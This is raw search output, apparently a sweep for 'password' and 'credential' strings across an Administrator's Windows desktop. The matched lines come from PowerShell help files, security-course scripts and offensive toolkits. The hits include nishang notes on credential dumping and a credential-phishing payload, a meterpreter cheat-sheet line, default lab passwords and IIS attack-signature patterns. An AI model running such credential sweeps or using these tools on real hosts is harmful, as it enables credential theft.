C:\Users\Administrator\Desktop\log.txt:356:PasswordNeverExpires - A property of type System.Boolean, for AD LDS C:\Users\Administrator\Desktop\log.txt:358:attribute: msDS-UserDontExpirePassword C:\Users\Administrator\Desktop\log.txt:360:PasswordNotRequired - A property of type System.Boolean, for AD DS it C:\Users\Administrator\Desktop\log.txt:362:attribute: ms-DS-UserPasswordNotRequired C:\Users\Administrator\Desktop\log.txt:364:ADDefaultDomainPasswordPolicy C:\Users\Administrator\Desktop\log.txt:366:domain-wide password policy of an Active Directory C:\Users\Administrator\Desktop\log.txt:368:ADDefaultDomainPasswordPolicy may contain the following properties C:\Users\Administrator\Desktop\log.txt:369:C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_Obj ectModel.help.txt:721: MaxPasswordAge C:\Users\Administrator\Desktop\log.txt:371:C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\en-US\about_ActiveDirectory_Obj ectModel.help.txt:724: MinPasswordAge C:\Users\Administrator\Desktop\log.txt:374:MinPasswordLength - A property of type System.Int32, derived from the C:\Users\Administrator\Desktop\log.txt:376:PasswordHistoryCount - A property of type System.Int32, derived from C:\Users\Administrator\Desktop\log.txt:378:C:\Users\\AppData\Local\Microsoft\Windows\PowerShell\ScheduledJob C:\Users\Administrator\Desktop\log.txt:380:permissions of the user who is specified by the Credential C:\Users\Administrator\Desktop\log.txt:382:C:\Users\\AppData\Local\Microsoft\Windows\PowerShell C:\Users\Administrator\Desktop\log.txt:383:C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_ActivityCommonParameters .help.txt:55: PSCredential C:\Users\Administrator\Desktop\log.txt:384:C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_ActivityCommonParameters .help.txt:216: user's credentials C:\Users\Administrator\Desktop\log.txt:387:NegotiateWithImplicitCredential. The default C:\Users\Administrator\Desktop\log.txt:388:C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_ActivityCommonParameters .help.txt:227: CAUTION: Credential C:\Users\Administrator\Desktop\log.txt:391:which the user's credentials are passed C:\Users\Administrator\Desktop\log.txt:393:computer is compromised, the credentials that C:\Users\Administrator\Desktop\log.txt:395:command must include the PSCredential C:\Users\Administrator\Desktop\log.txt:396:C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_ActivityCommonParameters .help.txt:336: -PSCredential C:\Users\Administrator\Desktop\log.txt:397: C:\Users\Administrator\Desktop\log.txt:399:that contains a PSCredential object, C:\Users\Administrator\Desktop\log.txt:401:Get-Credential cmdlet returns. If C:\Users\Administrator\Desktop\log.txt:402:C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_ActivityCommonParameters .help.txt:348: password. C:\Users\Administrator\Desktop\log.txt:404:PSCredential. The PS-prefixed parameters configure C:\Users\Administrator\Desktop\log.txt:406:mechanism that is used to authenticate the user's credentials C:\Users\Administrator\Desktop\log.txt:408:Kerberos, Negotiate, and NegotiateWithImplicitCredential. C:\Users\Administrator\Desktop\log.txt:409:C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_WorkflowCommonParameters .help.txt:102: CAUTION: Credential C:\Users\Administrator\Desktop\log.txt:412:credentials are passed to a remote computer to be C:\Users\Administrator\Desktop\log.txt:414:credentials that are passed to it can be used to control C:\Users\Administrator\Desktop\log.txt:416:the PSCredential parameter. Also, the computer must be C:\Users\Administrator\Desktop\log.txt:417:C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_WorkflowCommonParameters .help.txt:209: -PSCredential C:\Users\Administrator\Desktop\log.txt:418: C:\Users\Administrator\Desktop\log.txt:420:contains a PSCredential object, such as one that the C:\Users\Administrator\Desktop\log.txt:421:C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_WorkflowCommonParameters .help.txt:216: Get-Credential C:\Users\Administrator\Desktop\log.txt:424:password. C:\Users\Administrator\Desktop\log.txt:425:C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_Workflows.help.txt:157: -Credential C:\Users\Administrator\Desktop\log.txt:427:C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSWorkflow\en-US\about_Workflows.help.txt:174: -Credential C:\Users\Administrator\Desktop\log.txt:429:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Automatic_Variables.help.txt:109: typically C:\Users\. C:\Users\Administrator\Desktop\log.txt:430:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Functions_Advanced_Parameters.help.txt:181: parameter set, a UserName C:\Users\Administrator\Desktop\log.txt:432:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Functions_Advanced_Parameters.help.txt:194: $UserName, C:\Users\Administrator\Desktop\log.txt:433:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Functions_Advanced_Parameters.help.txt:220: $UserName, C:\Users\Administrator\Desktop\log.txt:434:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Functions_Advanced_Parameters.help.txt:561: $UserName C:\Users\Administrator\Desktop\log.txt:435:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Functions_OutputTypeAttribute.help.txt:133: $UserName C:\Users\Administrator\Desktop\log.txt:437:credentials. It C:\Users\Administrator\Desktop\log.txt:438:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Jobs.help.txt:305: credentials to run the command. The value of the Reason C:\Users\Administrator\Desktop\log.txt:440:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Language_Modes.help.txt:172: PSCredential C:\Users\Administrator\Desktop\log.txt:441:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Pipelines.help.txt:367: Parameter [Credential] PIPELINE INPUT C:\Users\Administrator\Desktop\log.txt:443:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Preference_Variables.help.txt:1084: ProxyCredential : C:\Users\Administrator\Desktop\log.txt:445:credentials of a member of C:\Users\Administrator\Desktop\log.txt:446:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_PSSession_Details.help.txt:142: only if you can supply the credentials of the user C:\Users\Administrator\Desktop\log.txt:448:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_PSSession_Details.help.txt:144: includes RunAs credentials. Otherwise, you can C:\Users\Administrator\Desktop\log.txt:451:credentials that were used C:\Users\Administrator\Desktop\log.txt:453:credentials of C:\Users\Administrator\Desktop\log.txt:454:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_FAQ.help.txt:63: name and password credentials on the local computer or the C:\Users\Administrator\Desktop\log.txt:455:credentials C:\Users\Administrator\Desktop\log.txt:456:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_FAQ.help.txt:65: The credentials and the rest of the transmission are C:\Users\Administrator\Desktop\log.txt:458:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_FAQ.help.txt:513: to use the Credential parameter of the Invoke-Command, C:\Users\Administrator\Desktop\log.txt:460:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_FAQ.help.txt:514: or Enter-PSSession cmdlets to provide the credentials of C:\Users\Administrator\Desktop\log.txt:462:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_FAQ.help.txt:521: credentials. C:\Users\Administrator\Desktop\log.txt:463:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Requirements.help.txt:62: provide the credentials of an administrator. C:\Users\Administrator\Desktop\log.txt:465:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:273: HOW TO PROVIDE ADMINISTRATOR CREDENTIALS C:\Users\Administrator\Desktop\log.txt:466:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:279: computer. Credentials are sometimes required C:\Users\Administrator\Desktop\log.txt:468:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:283: computer, or can provide the credentials of a C:\Users\Administrator\Desktop\log.txt:470:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:284: group, use the Credential parameter of the C:\Users\Administrator\Desktop\log.txt:473:the credentials of an C:\Users\Administrator\Desktop\log.txt:475:-Credential Domain01\Admin01 C:\Users\Administrator\Desktop\log.txt:476:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:292: For more information about the Credential C:\Users\Administrator\Desktop\log.txt:478:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:374: 2. Use the Credential parameter in all remote C:\Users\Administrator\Desktop\log.txt:481:submitting the credentials C:\Users\Administrator\Desktop\log.txt:482:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:400: 2. Verify that a password is set on the C:\Users\Administrator\Desktop\log.txt:484:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:401: password is not set or the password value C:\Users\Administrator\Desktop\log.txt:486:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:404: To set password for your user account, use C:\Users\Administrator\Desktop\log.txt:488:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:408: 3. Use the Credential parameter in all remote C:\Users\Administrator\Desktop\log.txt:491:submitting the credentials C:\Users\Administrator\Desktop\log.txt:492:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Remote_Troubleshooting.help.txt:544: -- ProxyCredential C:\Users\Administrator\Desktop\log.txt:494:ProxyAuthentication, and ProxyCredential C:\Users\Administrator\Desktop\log.txt:496:-ProxyCredential Domain01\User01 C:\Users\Administrator\Desktop\log.txt:497:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Return.help.txt:44: function ScreenPassword($instance) C:\Users\Administrator\Desktop\log.txt:499:ScreenPassword($a) } C:\Users\Administrator\Desktop\log.txt:500:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Return.help.txt:53: This script checks each user account. The ScreenPassword C:\Users\Administrator\Desktop\log.txt:503:password-protected C:\Users\Administrator\Desktop\log.txt:504:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Return.help.txt:55: screen saver. If the screen saver is password protected, the C:\Users\Administrator\Desktop\log.txt:506:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Scopes.help.txt:529: $Cred = Get-Credential C:\Users\Administrator\Desktop\log.txt:507:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Scopes.help.txt:530: Invoke-Command $s {Remove-Item .\Test*.ps1 -Credential C:\Users\Administrator\Desktop\log.txt:509:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Scopes.help.txt:537: $Cred = Get-Credential C:\Users\Administrator\Desktop\log.txt:511:-Credential $c} -ArgumentList $Cred C:\Users\Administrator\Desktop\log.txt:512:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Script_Internationalization.help.txt:157:if (!($username)) { $msgTable.promptMsg } C:\Users\Administrator\Desktop\log.txt:514:can supply the credentials of a C:\Users\Administrator\Desktop\log.txt:515:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Session_Configuration_Files.help.txt:230: RunAsPassword C:\Users\Administrator\Desktop\log.txt:516:NoteProperty System.String RunAsPassword= C:\Users\Administrator\Desktop\log.txt:518:password. The C:\Users\Administrator\Desktop\log.txt:519:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:174: password ensures that no one can use or access the C:\Users\Administrator\Desktop\log.txt:521:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:175: your consent. Create and enter a password that you can C:\Users\Administrator\Desktop\log.txt:523:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:176: use this password later to retrieve the certificate. C:\Users\Administrator\Desktop\log.txt:524:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:277: 6. Type a password, and then type it again to confirm. C:\Users\Administrator\Desktop\log.txt:525:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:293: 4. On the Password page, select "Enable strong private C:\Users\Administrator\Desktop\log.txt:527:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Signing.help.txt:294: and then enter the password that you assigned during C:\Users\Administrator\Desktop\log.txt:530:UseDefaultCredentials C:\Users\Administrator\Desktop\log.txt:531:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Updatable_Help.help.txt:157: parameter that provides the explicit credentials of C:\Users\Administrator\Desktop\log.txt:534:Credential C:\Users\Administrator\Desktop\log.txt:535:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Updatable_Help.help.txt:164: Credential parameter is valid only when you use the C:\Users\Administrator\Desktop\nishang-master\CHANGELOG.txt:32:- Added support for dumping cleartext credentials from RDP sessions for Invoke-MimikatzWfigestDowngrade. C:\Users\Administrator\Desktop\nishang-master\CHANGELOG.txt:49:- Removed hard coded credentials from Invoke-PSGcat.ps1 and Invoke-PSGcat in Powerpreter. So embarrassing! C:\Users\Administrator\Desktop\nishang-master\CHANGELOG.txt:74:- Credentials script renamed to Invoke-CredentialsPhish. C:\Users\Administrator\Desktop\nishang-master\CHANGELOG.txt:186:- Fixed help in Credentials.ps1 C:\Users\Administrator\Desktop\nishang-master\CHANGELOG.txt:191:- Fixed a bug in Credentials.ps1 C:\Users\Administrator\Desktop\nishang-master\CHANGELOG.txt:195:- Credentials payload now validates both local and AD crdentials. If creds entered could not be validated locally or at AD, credential prompt is shown again. C:\Users\Administrator\Desktop\nishang-master\CHANGELOG.txt:208:- Removed delay in the credentials payload's prompt. Now the prompt asking for credentials will keep appearing instantly if nothing is entered. C:\Users\Administrator\Desktop\nishang-master\CHANGELOG.txt:210:- Removed hard coded credentials from Credentials.ps1 :| and edited the code to accept user input. C:\Users\Administrator\Desktop\PowerSploit-master\Recon\Dictionaries\generic.txt:969:password/ C:\Users\Administrator\Desktop\PowerSploit-master\Recon\Dictionaries\generic.txt:970:passwords/ C:\Users\Administrator\Desktop\SEC505-Scripts\Laptop-Setup-README-NOW.txt:46:Note: The script will reset your password to "P@ssword" inside the VM. C:\Users\Administrator\Desktop\SEC505-Scripts\Day1-PowerShell\Examples\signatures.txt:17:iisadmpwd Attempts to access the IIS 4.0 change password scripts (reconnaissance). C:\Users\Administrator\Desktop\SEC505-Scripts\Day1-PowerShell\Examples\signatures.txt:47:/\~.+|\%2f\%7e Attempts to use a /~ in a request (possible username search). C:\Users\Administrator\Desktop\SEC505-Scripts\Day1-PowerShell\Misc\Sample_PowerShell_Transcript_Log.txt:4:Username: TESTING\TestUser47 C:\Users\Administrator\Desktop\SEC505-Scripts\Day2-Hardening\IIS\Log_Analysis\Signatures.txt:17:iisadmpwd Attempts to access the IIS 4.0 change password scripts (reconnaissance). C:\Users\Administrator\Desktop\SEC505-Scripts\Day2-Hardening\IIS\Log_Analysis\Signatures.txt:47:/\~.+|\%2f\%7e Attempts to use a /~ in a request (possible username search). C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:4:The passwords of local administrative accounts should be changed regularly and these passwords should be different from one computer to the next. But how can this been done securely and conveniently? How can this be done for free? C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:15:Copy the Update-PasswordArchive.ps1 script into that shared folder (\\server\share). C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:17:Using Group Policy, SCCM, a third-party EMS, SCHTASKS.EXE or some other technique, create a scheduled job on every computer that runs once per week (or every night) under Local System context that executes the following command: "powershell.exe \\server\share\update-passwordarchive.ps1 -certificatefilepath \\server\share\cert.cer -passwordarchivepath \\server\share -localusername administrator". This resets the password on the local Administrator account, or whatever account is specified, with a 15-25 character, random complex password. The password is encrypted in memory with the public key of the certificate (cert.cer) and saved to an archive file to the specified share (\\server\share). C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:19:When a password for a computer (laptop47) needs to be recovered, the trusted administrator should run from their own local computer the following PowerShell script: "recover-passwordarchive.ps1 -passwordarchivepath \\server\share -computername laptop47 -username helpdesk". This downloads the necessary encrypted files and decrypts them locally in memory using the private key of the administrator, displaying the plaintext password within PowerShell. C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:26:PowerShell 2.0 or later must be installed on both the computer with the local user account whose password is to be reset and also on the administrators' computers who will recover these passwords in plaintext. C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:28:The Update-PasswordArchive.ps1 script, which resets the password, must run with administrative or Local System privileges. C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:41:Copy the \Day2-DAC\UpdatePasswords folder to your hard drive. C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:43:In File Explorer, double-click the "Password-is-password.pfx" file to import the test certificate and private key into your current user store (accept all the defaults). The password is...password. C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:45:Open PowerShell with administrative privileges and run this command to reset the password on the Guest account: C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:47: .\Update-PasswordArchive.ps1 -LocalUserName Guest -CertificateFilePath .\PublicKeyCert.cer C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:53:If you open the file in Notepad or a hex editor, you'll see that it has been encrypted with the public key in the PublicKeyCert.cer file. The private key for this public key has already been imported into your local user certificate store, hence, you can use your private key to extract the password from the encrypted file. Unless hackers have stolen your private key, they will not be able to decrypt the file and obtain the password inside it. C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:55:To obtain the plaintext password, run this command: C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:57: .\Recover-PasswordArchive.ps1 -ComputerName $env:computername -UserName Guest C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:59:The output is an object with the plaintext password and other properties, similar to this: C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:63: UserName : Guest C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:68: Password : b4EAti!HiLX]QI2 C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:70:The password property can now be piped into other commands or copied into the wetware clipboard through your retinas. C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:74: get-help -full .\Update-PasswordArchive.ps1 C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:81:The password is never sent over the network in plaintext, never saved to disk in plaintext, and never exposed as a command-line argument, either when resetting the password or when recovering it later. The new password is generated randomly in the memory of the PowerShell process running on the computer where the password is reset. The process runs for less than a second as Local System in the background. C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:83:Different certificates can be used at different times, as long as their private keys are available to the administrator. When recovering a password, the correct certificate and private key will be used automatically. A smart card can be used too. The script has been successfully tested with the Common Access Card (CAC) used by the U.S. military and DoD. C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:85:If the shared folder is not accessible to the computer when the scheduled job runs, the password is not reset. C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:87:If multiple administrators must be able to recover the plaintext passwords, export the relevant certificate and private key to a PFX file and import it into each administrator's local profile. Because this is not a certificate used to uniquely identify a person or device, everyone on the help desk could have a copy of its private key (though this increases the risk of private key exposure as more copies are distributed). C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:91:The update script writes to the Application event log whenever and wherever the script is run (Source: PasswordArchive, Event ID: 9013). C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:93:The script can only be used to reset the passwords of local accounts, not domain accounts in AD. C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:100:Keep the private key for the certificate used to encrypt the password archive files secure, such as on a smart card. This is the most important factor. C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:102:If the private key for the certificate is compromised, create a new key pair, replace the certificate file (.CER) in the shared folder, and immediately remotely trigger the scheduled job on all machines using Group Policy, SCHTASKS.EXE or some other technique. Once all passwords have been changed, the fact that the old private key has been compromised does not mean any current passwords are known. C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:104:Use an RSA public key which is 2048 bits or larger. The public key encrypts a random 256-bit Rijndael key, which encrypts the password. Every file has a different Rijndael key. RSA and Rijndael are used for maximum backwards compatibility (using AES explicitly in the script requires .NET Framework 3.5 or later). C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:106:Prevent modification of the Update-PasswordArchive.ps1 script itself by digitally signing the script, enforcing script signature requirements, and using restrictive NTFS permissions. Only allow NTFS read access to the script to those identities (computer accounts) which need to run it. Use NTFS auditing to track changes to the script. C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:108:Attackers may try to corrupt or delete the existing password archive files to prevent access to current passwords. Each archive file contains an encrypted SHA256 hash of the username, computername and password in that file in order to detect modified or damaged bits; the hash is checked whenever a password is recovered. C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:127:An attacker might try to generate millions of spoofed archive files and add them to the shared folder. This is possible because the script and public key would be accessible to the attacker too. Realistically, though, a DoS attack in which millions of new archive files are created would likely be of low value for the attacker since it would be easy to detect, easy to log the name or IP of the machine creating the new files, easy to use timestamps in the share to identify post-attack files, easy to recover from nightly or weekly backups, and the DoS attack would not allow the hacker to expand their existing powers to new machines. Besides, the benefit to us of managing local administrative account passwords correctly far exceeds the potential negative of this sort of DoS attack. C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:136:The output of the Recover-PasswordArchive.ps1 script can be piped into other scripts to automate other tasks which require the plaintext password, such as executing commands, doing WMI queries, opening an RDP session, or immediately resetting the password again when finished. C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:138:When recovering a password, you can pipe the password into the built-in clip.exe utility to put the password into the clipboard, like this: C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:140: \\controller\password-archives\Recover-PasswordArchive.ps1 ` C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:141: -PasswordArchivePath \\controller\password-archives -ComputerName laptop47 ` C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:142: -UserName Administrator | select-object -expandproperty password | clip.exe C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:144:Keep the number of files in the archive folder manageable by using the CleanUp-PasswordArchives.ps1 script. Perhaps running this script as a scheduled job every two or four weeks. C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:146:To optimize the performance of the Recover-PasswordArchive.ps1 script when there are more than 100,000 files in the folder containing the password archives, disable 8.3 file name generation and strip all current 8.3 names on the volume containing that folder. Search the Internet on "fsutil.exe 8dot3name" to see how. C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:150:You can also perform an immediate password update with commands wrapped in a function like the following: C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:153: Invoke-Command -ComputerName laptop47 -filepath .\Update-PasswordArchive.ps1 -argumentlist "C:\publickeycert.cer","Administrator","c:\" C:\Users\Administrator\Desktop\SEC505-Scripts\Day4-Admins\UpdatePasswords\README.txt:158:The above Invoke-Command can be done by specifying UNC paths instead, but this requires delegation of credentials to the remote computer, which is not ideal for limiting token abuse attacks, so the certificate and archive files should be copied back-and-forth manually. Besides, wrapped in a function, all these steps would be hidden from us anyway. C:\Users\Administrator\Desktop\SEC505-Scripts\Day6-Servers\Event_Log_ID_Numbers.txt:23:529 = Logon Failure: Unknown user name or bad password C:\Users\Administrator\Desktop\SEC505-Scripts\Day6-Servers\Event_Log_ID_Numbers.txt:29:535 = The specified account's password has expired C:\Users\Administrator\Desktop\SEC505-Scripts\Day6-Servers\Event_Log_ID_Numbers.txt:72:627 = Change Password Attempt C:\Users\Administrator\Desktop\SEC505-Scripts\Day6-Servers\Event_Log_ID_Numbers.txt:73:628 = User Account password set C:\Users\Administrator\Desktop\SEC505-Scripts\Day6-Servers\Kali-Linux-CheatSheet.txt:6:Default username is "root", password is "toor". C:\Users\Administrator\Desktop\SEC505-Scripts\Day6-Servers\Kali-Linux-CheatSheet.txt:63: Password, User and Group Management C:\Users\Administrator\Desktop\SEC505-Scripts\Day6-Servers\Kali-Linux-CheatSheet.txt:65:passwd C:\Users\Administrator\Desktop\SEC505-Scripts\Day6-Servers\Kali-Linux-CheatSheet.txt:67:id [] C:\Users\Administrator\Desktop\SEC505-Scripts\Day6-Servers\Kali-Linux-CheatSheet.txt:69:adduser C:\Users\Administrator\Desktop\SEC505-Scripts\Day6-Servers\Kali-Linux-CheatSheet.txt:70:deluser C:\Users\Administrator\Desktop\SEC505-Scripts\Day6-Servers\Kali-Linux-CheatSheet.txt:139:smbclient -U -W //server/share C:\Users\Administrator\Desktop\SEC505-Scripts\Day6-Servers\Kali-Linux-CheatSheet.txt:140:smbclient -U -W //server/share "" C:\Users\Administrator\Desktop\SEC505-Scripts\Day6-Servers\Kali-Linux-CheatSheet.txt:245:# To install meterpreter with a username and password/hash: C:\Users\Administrator\Desktop\SEC505-Scripts\Day6-Servers\Kerberos\License.txt:14:MEMBER ACCOUNT, PASSWORD, AND SECURITY C:\Users\Administrator\Desktop\SEC505-Scripts\Day6-Servers\Kerberos\License.txt:56:MEMBER ACCOUNT, PASSWORD, AND SECURITY C:\Users\Administrator\Desktop\SEC505-Scripts\Day6-Servers\Kerberos\License.txt:57:If any of the Services requires you to open an account, you must complete the registration process by providing us with current, complete and accurate information as prompted by the applicable registration form. You are entirely responsible for maintaining the confidentiality of your password and account. Furthermore, you are entirely responsible for any and all activities that occur under your account. You agree to notify Microsoft immediately of any unauthorized use of your account or any other breach of security. Microsoft will not be liable for any loss that you may incur as a result of someone else using your password or account, either with or without your knowledge. However, you could be held liable for losses incurred by Microsoft or another party due to someone else using your account or password. You may not use anyone else's account without the permission of the account holder. C:\Users\Administrator\Desktop\SEC505-Scripts\Day6-Servers\Kerberos\License.txt:61:As a condition of your use of Services, you will not use them for any purpose that is unlawful or prohibited by these terms, conditions, and notices. You may not use the Services in any manner that could damage, disable, overburden, or impair any Microsoft server, or the network(s) connected to any Microsoft server, or interfere with any other party’s use and enjoyment of any Services. You may not attempt to gain unauthorized access to any Services, other accounts, computer systems or networks connected to any Microsoft server or to any of the Services, through hacking, password mining or any other means. You may not obtain or attempt to obtain any materials or information through any means not intentionally made available through the Services. C:\Users\Administrator\Desktop\SEC505-Scripts\Day6-Servers\Kerberos\README.txt:1:This folder contains a PowerShell script to reset the password of C:\Users\Administrator\Desktop\SEC505-Scripts\Extras\VBScript\passwords.txt:1:password C:\Users\Administrator\Desktop\SEC505-Scripts\Extras\VBScript\signatures.txt:17:iisadmpwd attempts to access the IIS 4.0 change password scripts (reconnaissance). C:\Users\Administrator\Desktop\SEC505-Scripts\Extras\VBScript\signatures.txt:47:/\~.+|\%2f\%7e attempts to use a /~ in a request (possible username search). C:\Users\Administrator\Desktop\SysinternalsSuite\Eula.txt:28:Please be aware that, similar to other debug tools that capture “process state” information, files saved by Sysinternals tools may include personally identifiable or other sensitive information (such as usernames, passwords, paths to files accessed, and paths to registry accessed). By using this software, you acknowledge that you are aware of this and take sole responsibility for any personally identifiable or other sensitive information provided to Microsoft or any other party through your use of the software. C:\Users\Administrator\Desktop\SysinternalsSuite\readme.txt:18:Autologon - Bypass password screen during logon. C:\Users\Administrator\Desktop\SysinternalsSuite\readme.txt:102:PsPasswd - Changes account passwords. C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Automatic_Variables.help.txt:109: typically C:\Users\. C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Functions_Advanced_Parameters.help.txt:181: parameter set, a UserName parameter in the User parameter set, and a C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Functions_Advanced_Parameters.help.txt:194: $UserName, C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Functions_Advanced_Parameters.help.txt:220: $UserName, C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Functions_Advanced_Parameters.help.txt:561: $UserName C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Functions_OutputTypeAttribute.help.txt:133: $UserName C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Jobs.help.txt:287: The 